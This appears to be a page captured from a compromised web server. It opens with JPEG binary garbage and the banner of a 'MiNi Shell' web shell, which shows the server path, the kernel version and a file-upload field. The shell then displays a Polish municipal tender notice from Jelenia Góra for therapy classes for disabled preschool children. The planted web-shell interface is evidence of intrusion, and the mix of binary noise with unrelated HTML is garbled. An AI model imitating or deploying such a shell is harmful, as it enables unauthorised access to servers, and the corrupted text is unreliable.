JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170203/19619-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.jeleniagora.pl' target='_blank'>http://bip.jeleniagora.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 19619 - 2017
              z dnia 2017-02-03 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Jelenia Góra: "Wsparcie dzieci niepełnosprawnych oraz wzrost kwalifikacji nauczycieli w jeleniogórskich przedszkolach publicznych  zajęcia dydaktyczne<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />"Wsparcie dzieci niepełnosprawnych oraz wzrost kwalifikacji nauczycieli w jeleniogórskich przedszkolach publicznych Oś Priorytetowa: 10 Edukacja Działanie 10.1: Zapewnienie równego dostępu do wysokiej jakości edukacji przedszkolnej. Poddziałanie 10.1.3: Zapewnienie równego dostępu do wysokiej jakości edukacji przedszkolnej  ZIT Aglomeracji Jeleniogórskiej.</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Jelenia Góra, krajowy numer identyfikacyjny
              23082152300000, ul.
              Pl. Ratuszowy 
              58,
              58500  
              Jelenia Góra, woj.
              dolnośląskie, państwo
              Polska, tel.
              075 7546101, 75 46 201, e-mail
              ratusz_um@jeleniagora.pl, faks
              075 7546159, 7546204.
              <br />
              Adres strony internetowej (URL): www.jeleniagora.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.jeleniagora.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Dostarczyć w formie papierowej<br />
                Adres:
                <br />Urząd Miasta Jelenia Góra, Wydział Inwestycji i Zamówień Publicznych, ul. Sudecka 29, pokój 25, 58-500 Jelenia Góra, Polska</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>"Wsparcie dzieci niepełnosprawnych oraz wzrost kwalifikacji nauczycieli w jeleniogórskich przedszkolach publicznych  zajęcia dydaktyczne<br /><b>Numer referencyjny: </b>IZP-Z.271.4.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli,  którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra, w ramach projektu pn.: "Wsparcie dzieci niepełnosprawnych oraz wzrost kwalifikacji nauczycieli w jeleniogórskich przedszkolach publicznych realizowanego przez Miasto Jelenia Góra w ramach RPO WD 2014- 2020, Projekt nr RPDS.10.01.03-02-0005/16; Oś Priorytetowa: 10 Edukacja; Działanie 10.1 Zapewnienie równego dostępu do wysokiej jakości edukacji przedszkolneJ; Poddziałanie 10.1.3 - Zapewnienie równego dostępu do wysokiej jakości edukacji przedszkolnej  ZIT Aglomeracji Jeleniogórskiej.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.
<br /><br /><b>II.5) Główny kod CPV: </b>80000000-4<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/04/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia konkretnego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na podstawie ogólnego oświadczenia o spełnianiu warunków udziału w postępowaniu zawartego w treści oświadczenia Wykonawcy, o którym mowa w pkt. 9.2 Tomu I SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia konkretnego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na podstawie ogólnego oświadczenia o spełnianiu warunków udziału w postępowaniu zawartego w treści oświadczenia Wykonawcy, o którym mowa w pkt. 9.2 Tomu I SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi dysponować osobami, zdolnymi do wykonania zamówienia, które posiadają stosowne kwalifikacje zgodne z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli, w szczególności:
CZĘŚĆ I zajęcia arteterapii: studia wyższe mgr z przygotowaniem pedagogicznym i studia podyplomowe z zakresu arteterapii, w przypadku zajęć realizowanych w Przedszkolu Specjalnym funkcjonującym w Specjalnym Ośrodku Szkolno-Wychowawczym w Jeleniej Górze wymagane są studia podyplomowe z oligofrenopedagogiki; CZĘŚĆ II zajęcia arteterapii z zabawami kreatywnymi: studia wyższe mgr z przygotowaniem pedagogicznym 
i studia podyplomowe z zakresu arteterapii, w przypadku zajęć realizowanych w Przedszkolu Specjalnym funkcjonującym w Specjalnym Ośrodku Szkolno-Wychowawczym w Jeleniej Górze wymagane są studia podyplomowe z oligofrenopedagogiki; CZĘŚĆ III zajęcia terapii taktylnej: studia wyższe mgr z przygotowaniem pedagogicznym i kurs kwalifikacyjny; CZĘŚĆ IV zajęcia integracji sensorycznej: studia wyższe mgr z przygotowaniem pedagogicznym 
i kurs SI I i II stopnia; CZĘŚĆ V  zajęcia integracji sensorycznej z gimnastyką korekcyjną: studia wyższe mgr z przygotowaniem pedagogicznym 
i kurs Si  I i II stopnia oraz kurs gimnastyki korekcyjnej CZĘŚĆ VI zajęcia logopedyczne: studia wyższe mgr z przygotowaniem pedagogicznym 
oraz studia podyplomowe z zakresu neurologopedii lub studia podyplomowe z zakresu logopedii; zajęcia logopedyczne z elementami Logorytmiki: studia wyższe mgr z przygotowaniem pedagogicznym oraz studia podyplomowe z zakresu neurologopedii lub studia podyplomowe z zakresu logopedii; zajęcia logopedyczne z Metodą Dobrego startu: studia wyższe mgr z przygotowaniem pedagogicznym oraz studia podyplomowe z zakresu neurologopedii lub studia podyplomowe z zakresu logopedii; CZĘŚĆ VII zajęcia dogoterapii: studia wyższe mgr z przygotowaniem pedagogicznym i kurs kwalifikacyjny z zakresu dogoterapii, w przypadku zajęć realizowanych w Przedszkolu Specjalnym funkcjonującym w Specjalnym Ośrodku Szkolno-Wychowawczym w Jeleniej Górze wymagane są studia podyplomowe z oligofrenopedagogiki; CZĘŚĆ VIII zajęcia Montessori: studia wyższe mgr z przygotowaniem pedagogicznym i studia podyplomowe  oraz kurs kwalifikacyjny z zakresu Montessori, w przypadku zajęć realizowanych w Przedszkolu Specjalnym funkcjonującym w Specjalnym Ośrodku Szkolno-Wychowawczym w Jeleniej Górze wymagane są studia podyplomowe z oligofrenopedagogiki; CZĘŚĆ IX zajęcia muzykoterapii: studia wyższe mgr z przygotowaniem pedagogicznym i studia z muzykoterapii lub kurs kwalifikacyjny, w przypadku zajęć realizowanych w Przedszkolu Specjalnym funkcjonującym w Specjalnym Ośrodku Szkolno-Wychowawczym 
w Jeleniej Górze wymagane są studia podyplomowe z oligofrenopedagogiki; CZĘŚĆ X zajęcia z psychologiem: studia wyższe mgr z przygotowaniem pedagogicznym i studia z psychologii, w przypadku zajęć realizowanych 
w Przedszkolu Specjalnym funkcjonującym w Specjalnym Ośrodku Szkolno-Wychowawczym w Jeleniej Górze wymagane są studia podyplomowe z oligofrenopedagogiki; CZĘŚĆ XI pełnienie funkcji asystenta dziecka: studia magisterskie lub studia pierwszego stopnia na kierunku pedagogika specjalna z przygotowaniem pedagogicznym lub ukończone studia magisterskie lub studia pierwszego stopnia na kierunku edukacja przedszkolna i wczesnoszkolna.



 













<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa w pkt 9.6 ppkt 1.4) Tomu I SIWZ, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w z § 7 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów,jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia(Dz.U.2016.1126), zastępuje się je dokumentem zawierającym odpowiednio: - oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub - oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: Z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów w przedmiotowym zakresie.
2) sytuacji ekonomicznej lub finansowej: Z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów w przedmiotowym zakresie. 3) zdolności technicznej lub zawodowej (odpowiednio dla części, której/których dotyczy oferta: a) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z
treścią załącznika nr 3 do Tomu I SIWZ.
OCENA SPEŁNIENIA KAŻDEGO Z WARUNKÓW UDZIAŁU W POSTĘPOWANIU BĘDZIE DOKONANA NA PODSTAWIE DOKUMENTÓW WEDŁUG FORMUŁY: SPEŁNIA-NIE SPEŁNIA. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">I. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu (...), polegać na zdolnościach technicznych lub zawodowych lub
sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. 1) W sytuacji
określonej w pkt I. Wykonawca zobowiązany jest udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych
podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji
zamówienia. 2) Jeżeli wykonawca, powołuje się na zasoby innych podmiotów, w celu wykazania wobec nich: a) braku podstaw do wykluczenia, o których
mowa w art. 24 ust. 1 oraz ust. 5 u.p.z.p b) spełniania warunków, o których mowa w art. 22 ust. 1b u.p.z.p. zobowiązany jest zamieścić w oświadczeniu, o którym mowa w pkt. 9.2 Tomu I SIWZ informacje o tych podmiotach. 
II. Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 9.6 ppkt 1.4) Tomu I SIWZ w zakresie wymaganym od wykonawcy.
III. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,oświadczenie o którym mowa w pkt 9.2 Tomu I SIWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia. 
IV.Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej w rozumieniu 5 ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. 2015.184 1618 i 1634 z późn zm.)  zgodnie z treścią załącznika nr 4 do Tomu I SIWZ. Oświadczenie należy złożyć w ciągu 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5. (informacje z sesji otwarcia ofet)</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
